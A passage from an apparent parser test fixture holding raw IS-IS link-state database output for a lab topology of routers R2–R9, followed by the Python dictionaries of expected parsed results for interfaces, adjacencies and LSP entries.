Extended IP : 10.2.3.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.4.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.6.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Hostname : R3 Length : 2
TopoId: 2
MtExtend IS : R3.01 Metric : 10
R4.03 Metric : 10
R3.05 Metric : 10
IPv6 Address : 2001:db8:3:3:3::3
MT-IPv6 Prefx : TopoId : 2
2001:db8:3:3:3::3/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:2::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:3::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:16386 Att: 0 Ol: 0
Digest Offset : 0
R3.01-00 0x00000352 0xEF24 866 0/0/0/3
Instance : 0x00000351
Extended IS : R3.00 Metric : 0
Extended IS : R5.00 Metric : 0
Digest Offset : 0
R3.05-00 0x0000034D 0xDDD0 676 0/0/0/3
Instance : 0x0000034C
Extended IS : R3.00 Metric : 0
Extended IS : R6.00 Metric : 0
Digest Offset : 0
R4.00-00 0x00000353 0x4A65 778 0/0/0/1
Instance : 0x0000034F
Area Address : 49.0002
Extended IS : R4.03 Metric : 10
Extended IS : R5.02 Metric : 10
NLPID : 0xCC 0x8E
IP Address : 4.4.4.4
Extended IP : 4.4.4.4/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.4.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.4.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Hostname : R4 Length : 2
TopoId: 2
MtExtend IS : R4.03 Metric : 10
R5.02 Metric : 10
IPv6 Address : 2001:db8:4:4:4::4
MT-IPv6 Prefx : TopoId : 2
2001:db8:4:4:4::4/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:3::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:4::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Digest Offset : 0
R4.03-00 0x0000034B 0x54C6 902 0/0/0/1
Instance : 0x0000034A
Extended IS : R4.00 Metric : 0
Extended IS : R3.00 Metric : 0
Digest Offset : 0
R5.00-00 0x0000034D 0xDFA6 984 1/0/0/3
Instance : 0x0000034B
Area Address : 49.0002
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:16386 Att: 0 Ol: 0
Hostname : R5 Length : 2
Extended IS : R5.03 Metric : 10
Extended IS : R3.01 Metric : 10
Extended IS : R5.02 Metric : 10
TopoId: 2
MtExtend IS : R5.03 Metric : 10
R3.01 Metric : 10
R5.02 Metric : 10
IP Address : 5.5.5.5
Extended IP : 5.5.5.5/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.4.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.5.7.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:db8:5:5:5::5
MT-IPv6 Prefx : TopoId : 2
2001:db8:5:5:5::5/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:3::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:4::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:5::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R5.02-00 0x0000034E 0xA5B5 651 0/0/0/3
Instance : 0x0000034D
Extended IS : R5.00 Metric : 0
Extended IS : R4.00 Metric : 0
Digest Offset : 0
R5.03-00 0x0000034F 0x9C89 897 0/0/0/3
Instance : 0x0000034E
Extended IS : R5.00 Metric : 0
Extended IS : R7.00 Metric : 0
Digest Offset : 0
R6.00-00 0x000004B3 0xA52C 987 0/0/0/1
Instance : 0x000004B1
Area Address : 49.0002
NLPID : 0xCC 0x8E
Router ID : 6.6.6.6
IP Address : 6.6.6.6
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R6 Length : 2
TopoId: 2
MtExtend IS : R3.05 Metric : 40
R7.02 Metric : 40
Extended IS : R3.05 Metric : 40
Extended IS : R7.02 Metric : 40
Extended IP : 6.6.6.0/24 Metric : 1 (U)
Extended IP : 10.6.7.0/24 Metric : 40 (U)
Extended IP : 10.3.6.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:db8:6:6:6::6/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:6::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:3::/64 Metric : 40 (U/I)
Digest Offset : 0
R7.00-00 * 0x000004B6 0x425F 787 1/0/0/3
Instance : 0x000004B6
Area Address : 49.0002
NLPID : 0xCC 0x8E
Router ID : 7.7.7.7
IP Address : 7.7.7.7
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R7 Length : 2
TopoId: 2
MtExtend IS : R7.02 Metric : 40
R5.03 Metric : 40
Extended IS : R7.02 Metric : 40
Extended IS : R5.03 Metric : 40
Extended IP : 10.7.8.0/24 Metric : 40 (D)
Extended IP : 7.7.7.7/32 Metric : 1 (U)
Extended IP : 10.7.9.0/24 Metric : 40 (U)
Extended IP : 10.6.7.0/24 Metric : 40 (U)
Extended IP : 10.5.7.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:7::/64 Metric : 40 (D/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:7:7:7::7/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:77::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:6::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:5::/64 Metric : 40 (U/I)
Digest Offset : 0
R7.02-00 * 0x000004B2 0x25F2 697 0/0/0/3
Instance : 0x000004B2
Extended IS : R6.00 Metric : 0
Extended IS : R7.00 Metric : 0
Digest Offset : 0
IS-IS Level-2 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R2.00-00 0x00000351 0x4E40 870 0/0/0/3
Instance : 0x0000034D
Area Address : 49.0001
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R2 Length : 2
Extended IS : R3.07 Metric : 10
TopoId: 2
MtExtend IS : R3.07 Metric : 10
IP Address : 2.2.2.2
Extended IP : 2.2.2.2/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.1.2.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.2.3.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 1.1.1.1/32 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:db8:2:2:2::2
MT-IPv6 Prefx : TopoId : 2
2001:db8:2:2:2::2/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:1:1:1::1/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:1::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:2::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R3.00-00 0x00000359 0xC91D 618 0/0/0/3
Instance : 0x00000353
Area Address : 49.0002
Extended IS : R3.01 Metric : 10
Extended IS : R3.07 Metric : 10
NLPID : 0xCC 0x8E
IP Address : 3.3.3.3
Extended IP : 3.3.3.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.2.3.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.4.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.6.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 4.4.4.4/32 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 5.5.5.5/32 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.4.5.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.5.7.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 7.7.7.7/32 Metric : 21 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.7.9.0/24 Metric : 60 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.6.7.0/24 Metric : 50 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 6.6.6.0/24 Metric : 11 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Hostname : R3 Length : 2
TopoId: 2
MtExtend IS : R3.01 Metric : 10
R3.07 Metric : 10
IPv6 Address : 2001:db8:3:3:3::3
MT-IPv6 Prefx : TopoId : 2
2001:db8:3:3:3::3/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:2::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:3::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:4:4:4::4/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:5:5:5::5/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:4::/64 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:5::/64 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:7:7:7::7/128 Metric : 21 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:77::/64 Metric : 60 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:6:6:6::6/128 Metric : 11 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:6::/64 Metric : 50 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Digest Offset : 0
R3.01-00 0x0000034F 0xF521 712 0/0/0/3
Instance : 0x0000034E
Extended IS : R3.00 Metric : 0
Extended IS : R5.00 Metric : 0
Digest Offset : 0
R3.07-00 0x00000351 0xC77A 1086 0/0/0/3
Instance : 0x00000350
Extended IS : R3.00 Metric : 0
Extended IS : R2.00 Metric : 0
Digest Offset : 0
R5.00-00 0x00000353 0xC9D4 606 0/0/0/3
Instance : 0x00000351
Area Address : 49.0002
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R5 Length : 2
Extended IS : R5.03 Metric : 10
Extended IS : R3.01 Metric : 10
TopoId: 2
MtExtend IS : R5.03 Metric : 10
R3.01 Metric : 10
IP Address : 5.5.5.5
Extended IP : 5.5.5.5/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.4.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.5.7.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 7.7.7.7/32 Metric : 11 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.7.9.0/24 Metric : 50 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.6.7.0/24 Metric : 50 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 4.4.4.4/32 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.4.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 3.3.3.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.2.3.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.6.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 6.6.6.0/24 Metric : 21 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:db8:5:5:5::5
MT-IPv6 Prefx : TopoId : 2
2001:db8:5:5:5::5/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:3::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:4::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:5::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:7:7:7::7/128 Metric : 11 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:6::/64 Metric : 50 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:77::/64 Metric : 50 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:3:3:3::3/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:4:4:4::4/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:2::/64 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT-IPv6 Prefx : TopoId : 2
2001:db8:6:6:6::6/128 Metric : 21 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R5.03-00 0x0000034E 0xB6F8 642 0/0/0/3
Instance : 0x0000034D
Extended IS : R5.00 Metric : 0
Extended IS : R7.00 Metric : 0
Digest Offset : 0
R7.00-00 * 0x000004B5 0x59EB 926 0/0/0/3
Instance : 0x000004B5
Area Address : 49.0002
NLPID : 0xCC 0x8E
Router ID : 7.7.7.7
IP Address : 7.7.7.7
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R7 Length : 2
TopoId: 2
MtExtend IS : R5.03 Metric : 40
R9.01 Metric : 40
R8.01 Metric : 40
Extended IS : R5.03 Metric : 40
Extended IS : R9.01 Metric : 40
Extended IS : R8.01 Metric : 40
Extended IP : 10.6.7.0/24 Metric : 40 (U)
Extended IP : 7.7.7.7/32 Metric : 1 (U)
Extended IP : 10.7.9.0/24 Metric : 40 (U)
Extended IP : 10.7.8.0/24 Metric : 40 (U)
Extended IP : 10.5.7.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:6::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:7:7:7::7/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:77::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:7::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:5::/64 Metric : 40 (U/I)
Digest Offset : 0
R8.00-00 0x0000034E 0x7758 1116 0/0/0/3
Instance : 0x0000034C
Area Address : 49.0003
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R8 Length : 2
Extended IS : R8.01 Metric : 10
TopoId: 2
MtExtend IS : R8.01 Metric : 10
IP Address : 8.8.8.8
Extended IP : 8.8.8.8/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.7.8.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:db8:8:8:8::8
MT-IPv6 Prefx : TopoId : 2
2001:db8:8:8:8::8/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:7::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R8.01-00 0x0000034E 0xF753 770 0/0/0/3
Instance : 0x0000034D
Extended IS : R8.00 Metric : 0
Extended IS : R7.00 Metric : 0
Digest Offset : 0
R9.00-00 0x0000034A 0x6C98 871 0/0/0/3
Instance : 0x00000347
Area Address : 49.0004
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R9 Length : 2
Extended IS : R9.01 Metric : 10
TopoId: 2
MtExtend IS : R9.01 Metric : 10
IP Address : 9.9.9.9
Extended IP : 9.9.9.9/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.7.9.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.9.10.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.10.10.10/32 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:db8:9:9:9::9
MT-IPv6 Prefx : TopoId : 2
2001:db8:9:9:9::9/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:7::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:9::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:10:10::10/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R9.01-00 0x00000352 0x5624 718 0/0/0/3
Instance : 0x00000351
Extended IS : R9.00 Metric : 0
Extended IS : R7.00 Metric : 0
Digest Offset : 0
'''
isisOpsOutput = {
'instance': {
'test': {
'process_id': 'test',
'vrf': {
'VRF1': {
'area_address': ['49.0002'],
'enable': True,
'graceful_restart': {
'enable': True,
},
'hostname_db': {
'hostname': {
'2222.2222.2222.00-00': {
'hostname': 'R2',
},
'7777.7777.7777.00-00': {
'hostname': 'R7',
},
},
},
'interfaces': {
'Ethernet1/5': {
'adjacencies': {
'R2': {
'neighbor_snpa': {
'fa16.3e63.eab0': {
'level': {
'level-2': {
'hold_timer': 9,
'state': 'Up',
},
},
},
},
},
},
'hello_interval': {
'level_1': {
'interval': 10,
},
'level_2': {
'interval': 10,
},
},
'hello_multiplier': {
'level_1': {
'multiplier': 3,
},
'level_2': {
'multiplier': 3,
},
},
'level_type': 'level-1-2',
'lsp_pacing_interval': 33,
'name': 'Ethernet1/5',
'priority': {
'level_1': {
'priority': 64,
},
'level_2': {
'priority': 64,
},
},
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '2',
},
},
},
'loopback1': {
'level_type': 'level-1-2',
'name': 'loopback1',
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 1,
},
'level_2': {
'metric': 1,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 1,
},
'level_2': {
'metric': 1,
},
},
'name': '2',
},
},
},
},
'lsp_mtu': 1492,
'metric_type': {
'value': 'wide-only',
},
'system_id': '7777.7777.7777',
'topologies': {
'0': {
'preference': {
'coarse': {
'default': 115,
},
},
'topology': '0',
},
'2': {
'preference': {
'coarse': {
'default': 115,
},
},
'topology': '2',
},
},
'vrf': 'VRF1',
},
'default': {
'area_address': ['49.0002'],
'enable': True,
'graceful_restart': {
'enable': True,
},
'hostname_db': {
'hostname': {
'2222.2222.2222.00-00': {
'hostname': 'R2',
},
'3333.3333.3333.00-00': {
'hostname': 'R3',
},
'4444.4444.4444.00-00': {
'hostname': 'R4',
},
'5555.5555.5555.00-00': {
'hostname': 'R5',
},
'6666.6666.6666.00-00': {
'hostname': 'R6',
},
'7777.7777.7777.00-00': {
'hostname': 'R7',
},
'8888.8888.8888.00-00': {
'hostname': 'R8',
},
'9999.9999.9999.00-00': {
'hostname': 'R9',
},
},
},
'interfaces': {
'Ethernet1/1': {
'adjacencies': {
'R5': {
'neighbor_snpa': {
'fa16.3ed0.46fc': {
'level': {
'level-1': {
'hold_timer': 8,
'state': 'Up',
},
'level-2': {
'hold_timer': 9,
'state': 'Up',
},
},
},
},
},
},
'hello_interval': {
'level_1': {
'interval': 10,
},
'level_2': {
'interval': 10,
},
},
'hello_multiplier': {
'level_1': {
'multiplier': 3,
},
'level_2': {
'multiplier': 3,
},
},
'level_type': 'level-1-2',
'lsp_pacing_interval': 33,
'name': 'Ethernet1/1',
'passive': True,
'priority': {
'level_1': {
'priority': 64,
},
'level_2': {
'priority': 64,
},
},
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '2',
},
},
},
'Ethernet1/2': {
'adjacencies': {
'R6': {
'neighbor_snpa': {
'5e00.4005.0007': {
'level': {
'level-1': {
'hold_timer': 30,
'state': 'Up',
},
},
},
},
},
},
'hello_interval': {
'level_2': {
'interval': 10,
},
},
'hello_multiplier': {
'level_2': {
'multiplier': 3,
},
},
'level_type': 'level-1-only',
'lsp_pacing_interval': 33,
'name': 'Ethernet1/2',
'priority': {
'level_2': {
'priority': 64,
},
},
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '2',
},
},
},
'Ethernet1/3': {
'adjacencies': {
'R8': {
'neighbor_snpa': {
'fa16.3eed.aa40': {
'level': {
'level-2': {
'hold_timer': 8,
'state': 'Up',
},
},
},
},
},
},
'hello_interval': {
'level_1': {
'interval': 10,
},
'level_2': {
'interval': 10,
},
},
'hello_multiplier': {
'level_1': {
'multiplier': 3,
},
'level_2': {
'multiplier': 3,
},
},
'level_type': 'level-2-only',
'lsp_pacing_interval': 33,
'name': 'Ethernet1/3',
'priority': {
'level_1': {
'priority': 64,
},
'level_2': {
'priority': 64,
},
},
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '2',
},
},
},
'Ethernet1/4': {
'adjacencies': {
'R9': {
'neighbor_snpa': {
'fa16.3e06.ce8d': {
'level': {
'level-2': {
'hold_timer': 9,
'state': 'Up',
},
},
},
},
},
},
'hello_interval': {
'level_1': {
'interval': 10,
},
},
'hello_multiplier': {
'level_1': {
'multiplier': 3,
},
},
'level_type': 'level-1-2',
'lsp_pacing_interval': 33,
'name': 'Ethernet1/4',
'priority': {
'level_1': {
'priority': 64,
},
'level_2': {
'priority': 64,
},
},
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '2',
},
},
},
'loopback0': {
'level_type': 'level-1-2',
'name': 'loopback0',
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 1,
},
'level_2': {
'metric': 1,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 1,
},
'level_2': {
'metric': 1,
},
},
'name': '2',
},
},
},
},
'lsp_mtu': 1492,
'metric_type': {
'value': 'wide-only',
},
'system_id': '7777.7777.7777',
'topologies': {
'0': {
'preference': {
'coarse': {
'default': 115,
},
},
'topology': '0',
},
'2': {
'preference': {
'coarse': {
'default': 115,
},
},
'topology': '2',
},
},
'vrf': 'default',
},
},
},
},
}
isisLsdbOpsOutput = {
'instance': {
'test': {
'vrf': {
'default': {
'level_db': {
1: {
'R3.00-00': {
'checksum': '0xD12B',
'dynamic_hostname': 'R3',
'extended_ipv4_reachability': {
'10.2.3.0/24': {
'ip_prefix': '10.2.3.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.4.0/24': {
'ip_prefix': '10.3.4.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.5.0/24': {
'ip_prefix': '10.3.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.6.0/24': {
'ip_prefix': '10.3.6.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'3.3.3.0/24': {
'ip_prefix': '3.3.3.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
},
'extended_is_neighbor': {
'R3.01': {
'metric': 10,
'neighbor_id': 'R3.01',
},
'R3.05': {
'metric': 10,
'neighbor_id': 'R3.05',
},
'R4.03': {
'metric': 10,
'neighbor_id': 'R4.03',
},
},
'ipv4_addresses': ['3.3.3.3'],
'ipv6_addresses': ['2001:db8:3:3:3::3'],
'lsp_id': 'R3.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'16386': {
'attributes': '0',
'mt_id': '16386',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:2::/64': {
'ip_prefix': '2001:db8:10:2::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:3:3:3::3/128': {
'ip_prefix': '2001:db8:3:3:3::3',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R3.05': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R3.05',
},
},
'remaining_lifetime': 712,
'sequence': '0x00000354',
},
'R3.01-00': {
'checksum': '0xEF24',
'extended_is_neighbor': {
'R3.00': {
'metric': 0,
'neighbor_id': 'R3.00',
},
'R5.00': {
'metric': 0,
'neighbor_id': 'R5.00',
},
},
'lsp_id': 'R3.01-00',
'remaining_lifetime': 866,
'sequence': '0x00000352',
},
'R3.05-00': {
'checksum': '0xDDD0',
'extended_is_neighbor': {
'R3.00': {
'metric': 0,
'neighbor_id': 'R3.00',
},
'R6.00': {
'metric': 0,
'neighbor_id': 'R6.00',
},
},
'lsp_id': 'R3.05-00',
'remaining_lifetime': 676,
'sequence': '0x0000034D',
},
'R4.00-00': {
'checksum': '0x4A65',
'dynamic_hostname': 'R4',
'extended_ipv4_reachability': {
'10.3.4.0/24': {
'ip_prefix': '10.3.4.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.4.5.0/24': {
'ip_prefix': '10.4.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'4.4.4.4/32': {
'ip_prefix': '4.4.4.4',
'metric': 10,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R4.03': {
'metric': 10,
'neighbor_id': 'R4.03',
},
'R5.02': {
'metric': 10,
'neighbor_id': 'R5.02',
},
},
'ipv4_addresses': ['4.4.4.4'],
'ipv6_addresses': ['2001:db8:4:4:4::4'],
'lsp_id': 'R4.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:4::/64': {
'ip_prefix': '2001:db8:10:4::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:4:4:4::4/128': {
'ip_prefix': '2001:db8:4:4:4::4',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R5.02': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R5.02',
},
},
'remaining_lifetime': 778,
'sequence': '0x00000353',
},
'R4.03-00': {
'checksum': '0x54C6',
'extended_is_neighbor': {
'R3.00': {
'metric': 0,
'neighbor_id': 'R3.00',
},
'R4.00': {
'metric': 0,
'neighbor_id': 'R4.00',
},
},
'lsp_id': 'R4.03-00',
'remaining_lifetime': 902,
'sequence': '0x0000034B',
},
'R5.00-00': {
'checksum': '0xDFA6',
'dynamic_hostname': 'R5',
'extended_ipv4_reachability': {
'10.3.5.0/24': {
'ip_prefix': '10.3.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.4.5.0/24': {
'ip_prefix': '10.4.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.5.7.0/24': {
'ip_prefix': '10.5.7.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'5.5.5.5/32': {
'ip_prefix': '5.5.5.5',
'metric': 10,
'prefix_len': '32',
